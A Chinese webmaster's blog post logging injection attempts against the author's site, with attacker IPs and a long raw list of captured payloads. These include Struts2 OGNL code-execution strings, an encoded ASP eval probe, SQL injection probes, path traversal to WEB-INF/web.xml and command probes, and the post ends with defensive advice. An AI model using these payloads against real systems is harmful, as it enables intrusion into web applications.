网站注入代码记录

来源:本站原创  浏览:672次  时间:2019-05-05

作为一家公司的网站管理员,一个字:累!网站经常遭到攻击、被注入非法信息,防不胜防,特别是 ASP 网站程序,会遇到大量的扫描和注入代码。下面看看入侵者是用什么代码尝试注入你的网站的!

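发起注入的恶意 IP(注:其中 108.162.*、162.158.*、172.68.*、173.245.48.* 落在 Cloudflare 公布的 CDN 地址段内,很可能只是代理节点而非攻击者的真实地址;封禁前应先通过 CF-Connecting-IP 等请求头还原真实来源 IP,否则可能误伤正常访客。)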

108.162.215.122
162.158.58.97
172.68.132.45
172.68.141.104
172.68.141.20
172.68.142.171
172.68.47.172
173.245.48.139
172.68.132.45
172.68.141.104
172.68.141.20
172.68.141.236
172.68.142.171
172.68.47.172
173.245.48.139
173.245.48.97
180.97.106.163
180.97.106.164
180.97.106.39
180.97.106.163
180.97.106.164
180.97.106.39

000001

000001

000484

000712

000745

Execute                              ("                              Execute                              (""          :Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(""""bd=bd&chr(&H""""&c&"""")""""):Else:Execute(""""bd=bd&chr(&H""""&c&Mid(s,i+2,2)&"""")""""):i=i+2:End If""&chr(10)&""Next:End Function:Response.Write(""""->|""""):                    Execute                              (""""On Error Resume Next:""""&bd(""""526573706F6E73652E5772697465282268616F72656E67652E636F6D51513331373237353733382229"""")):Response.Write(""""|<-""""):Response.End"")")


${#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close()}

${@print(md5(812812))}

${@print(md5(812812

%{#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close()}

%{(#test=*multipart/form-data*).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[*com.opensymphony.xwork2.ActionContext.container*]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType(*text/html

(#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)

(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)

(SELECT (CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (4624=4624) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(106)||CHR(118)||CHR(113)))

(SELECT (CHR(113)||CHR(118)||CHR(122)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (2130=2130) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(122)||CHR(98)||CHR(113)))

(SELECT (CHR(113)||CHR(122)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (8814=8814) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(120)||CHR(112)||CHR(113)))

(SELECT (CHR(113)||CHR(98)||CHR(113)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (5282=5282) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(106)||CHR(113)))

(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4070=4070) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(118)+CHAR(113))

(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (9952=9952) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113))

(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8386=8386) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113))

(SELECT CHAR(113)+CHAR(98)+CHAR(113)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7434=7434) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(106)+CHAR(113))

(SELECT CONCAT(0x7162716271,(SELECT (ELT(7981=7981,1))),0x7176626a71))

(SELECT CONCAT(0x7170707671,(SELECT (ELT(3194=3194,1))),0x716a6a7671))

(SELECT CONCAT(0x71767a7871,(SELECT (ELT(6582=6582,1))),0x71707a6271))

(SELECT CONCAT(0x717a6b7071,(SELECT (ELT(5363=5363,1))),0x717a787071))

*

*]

*+(#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+*

*+(#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())2

*+(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+*

*+(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())2

../../WEB-INF/web.xm

../../WEB-INF/web.xml

../../WEB-INF/web

..\..\WEB-INF/web.xm

..\..\WEB-INF/web.xml

..\..\WEB-INF/web

/**/cOnVeRt(int,(char(33)+char(126)+char(33)+(char(65)+char(66)+char(67)+char(49)+char(52)+char(53)+char(90)+char(81)+char(54)+char(50)+char(68)+char(87)+char(81)+char(65)+char(70)+char(80)+char(79)+char(73)+char(89)+char(67)+char(70)+char(68))+char(33)+char(126)+char(33)))

/../../WEB-INF/web.xm

/../../WEB-INF/web.xml

/../../WEB-INF/web

/usr/bin/id

;${@print(md5(812812))};//

;${@print(md5(812812))

\..\..\WEB-INF\web.xm

\..\..\WEB-INF\web.xml

\..\..\WEB-INF\web

\\..\....\\....\\WEB-INF\web.xm

\\..\....\\....\\WEB-INF\web.xml

\\..\....\\....\\WEB-INF\web

\\..\\..\\WEB-INF\\web.xm

\\..\\..\\WEB-INF\\web.xml

\\..\\..\\WEB-INF\\web

];${@print(md5(812812))};//

];${@print(md5(812812))

=

0 ORDER BY 1#

0" ORDER BY 1#

0") ORDER BY 1#

0-(-8281*2)-8281-8281

0) ORDER BY 1#

1 ORDER BY 1#

1"

1" ORDER BY 1#

1") ORDER BY 1#

1-(-8281*2)-8281-8281

1) ORDER BY 1#

1*

-1001

105 AnD BeNChMaRK(2999999,MD5(NOW()))

105&&BeNChMaRK(2999999,MD5(NOW()))

105&&SlEEp(3)

-1051

-1986

-1990

-1998

2 AnD BeNChMaRK(2999999,MD5(NOW()))

2 ORDER BY 1#

2" ORDER BY 1#

2") ORDER BY 1#

2&&BeNChMaRK(2999999,MD5(NOW()))

2&&SlEEp(3)

2-(-8281*2)-8281-8279

2-(-8281*2)-8281-8281

2) ORDER BY 1#

-2000

-2003) ORDER BY 1#

-2003

-2995

-2997

2and1=1

2AND1=1

2and1>1

3 ORDER BY 1#

3" ORDER BY 1#

3-(-8281*2)-8281-8281

3) ORDER BY 1#

-3000

-3918

392 AnD BeNChMaRK(2999999,MD5(NOW()))

392&&BeNChMaRK(2999999,MD5(NOW()))

392&&SlEEp(3)

-3921

-3994

-3998

4-(-8281*2)-8281-8281

-4001

-4003

-4102

-4104

-4111

-4112

-4113) ORDER BY 1#

-4119

-4127

-4128) ORDER BY 1#

-4553

-4557

-4558

456 AnD BeNChMaRK(2999999,MD5(NOW()))

456&&BeNChMaRK(2999999,MD5(NOW()))

456&&SlEEp(3)

-4568

-4569

-4573

-4599

460 AnD BeNChMaRK(2999999,MD5(NOW()))

460&&BeNChMaRK(2999999,MD5(NOW()))

460&&SlEEp(3)

-4604

461 AnD BeNChMaRK(2999999,MD5(NOW()))

461&&BeNChMaRK(2999999,MD5(NOW()))

461&&SlEEp(3)

-4610

-4611

-4624

-4628

463 AnD BeNChMaRK(2999999,MD5(NOW()))

463&&BeNChMaRK(2999999,MD5(NOW()))

463&&SlEEp(3)

-4633

-4669

467 AnD BeNChMaRK(2999999,MD5(NOW()))

467&&BeNChMaRK(2999999,MD5(NOW()))

467&&SlEEp(3)

-4676

-4677

467cp.asp?lx=big

-4689

-4696

-4774

-4777

478 AnD BeNChMaRK(2999999,MD5(NOW()))

478&&BeNChMaRK(2999999,MD5(NOW()))

478&&SlEEp(3)

-4789

479 AnD BeNChMaRK(2999999,MD5(NOW()))

479&&BeNChMaRK(2999999,MD5(NOW()))

479&&SlEEp(3)

-4797

-4799

-4832

-4835

484 AnD BeNChMaRK(2999999,MD5(NOW()))

484 AND SLEEP(5)-- xJzB

484 AND SLEEP(5)

484 ORDER BY 1-- FloG

484 ORDER BY 1-- rIqq

484 ORDER BY 1#

484&&BeNChMaRK(2999999,MD5(NOW()))

484&&SlEEp(3)

484-(-8281*2)-8281-8281

484)

484) ORDER BY 1-- PWWX

484) ORDER BY 1#

-4841

484cp.asp?lx=big

485?newsid=485

-4860

-4909

491 AnD BeNChMaRK(2999999,MD5(NOW()))

491&&BeNChMaRK(2999999,MD5(NOW()))

491&&SlEEp(3)

-4911

-4990

-4994

-4999

5-(-8281*2)-8281-8281

-5002

-5005

-5018

502?newsid=502

-5026

-5028

503-(-8281*2)-8281-8281

-5030

-5032

-5047

-5106

511 AnD BeNChMaRK(2999999,MD5(NOW()))

511&&BeNChMaRK(2999999,MD5(NOW()))

511&&SlEEp(3)

-5113

-5119

512 AnD BeNChMaRK(2999999,MD5(NOW()))

512&&BeNChMaRK(2999999,MD5(NOW()))

523?newsid=523

-5231

-5232

-5234

-5685) ORDER BY 1#

-5815

582 AnD BeNChMaRK(2999999,MD5(NOW()))

582&&BeNChMaRK(2999999,MD5(NOW()))

582&&SlEEp(3)

-5821

-5824

-5838

-5841

-5852

-5855

586 AnD BeNChMaRK(2999999,MD5(NOW()))

586&&BeNChMaRK(2999999,MD5(NOW()))

586&&SlEEp(3)

-5861

-5900

-5903

-5909

591 AnD BeNChMaRK(2999999,MD5(NOW()))

591&&BeNChMaRK(2999999,MD5(NOW()))

591&&SlEEp(3)

-5910

-5920

-5921

-5922

-5923

-5928

593?newsid=593

-5933

-5958

596?newsid=596

-5963

-5964

-5969

-5971) ORDER BY 1#

-5973

-5974

-5979

-5987

-5989

599 AnD BeNChMaRK(2999999,MD5(NOW()))

599&&BeNChMaRK(2999999,MD5(NOW()))

603 AnD BeNChMaRK(2999999,MD5(NOW()))

603&&BeNChMaRK(2999999,MD5(NOW()))

603&&SlEEp(3)

-6030

-6031

-6037

-6039

-6044

-6046

-6047

-6049

-6051

-6056

-6069

607?bookid=607

-6072

-6074

-6077

-6080

-6088

-6091

-6093

-6094

-6096) ORDER BY 1#

-6098

-6144

615 ORDER BY 1#

615-(-8281*2)-8281-8281

615) ORDER BY 1#

-6174

-6179

618-(-8281*2)-8281-8281

-6184

-6189

619 ORDER BY 1#

619" ORDER BY 1#

619") ORDER BY 1#

619-(-8281*2)-8281-8281

619) ORDER BY 1#

619?newsid=619

-6190

-6192

-6194

-6199

620?newsid=620

-6206

-6207

-6210

622?newsid=622

-6224

-6257

-6259

626 AnD BeNChMaRK(2999999,MD5(NOW()))

626&&BeNChMaRK(2999999,MD5(NOW()))

626&&SlEEp(3)

-6261

-6266) ORDER BY 1#

-6266

-6267

-9981

-9986

-9987

-9989

-9992

-9994

-9995

BchR1FPK

big ORDER BY 1#

big" ORDER BY 1#

big") ORDER BY 1#

big&

big) ORDER BY 1#

command

data://text/plain

Execute                              ("                              Execute                              (""          :Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(""""bd=bd&chr(&H""""&c&"""")""""):Else:Execute(""""bd=bd&chr(&H""""&c&Mid(s,i+2,2)&"""")""""):i=i+2:End If""&chr(10)&""Next:End Function:Response.Write(""""->|""""):                    Execute                              (""""On Error Resume Next:""""&bd(""""526573706F6E73652E5772697465282268616F72656E67652E636F6D51513331373237353733382229"""")):Response.Write(""""|<-""""):Response.End"")")

set

string:{var_dump(md5(81281

string:{var_dump(md5(812812))}

UTF-8

WEB-INF/

WEB-INF/web.xm

WEB-INF/web.xml

WEB-INF/web

WEB-INF\web.xm

WEB-INF\web.xml

WEB-INF\web

x||set||x


网站注入

网站攻击


总之,这些注入尝试里用得最多的就是特殊字符(引号、括号、#、$、%、../ 等)!所以防护的重点应放在对所有外部输入的严格校验和参数化查询上,并及时为 Struts2 等框架打补丁,而不是只靠封禁 IP。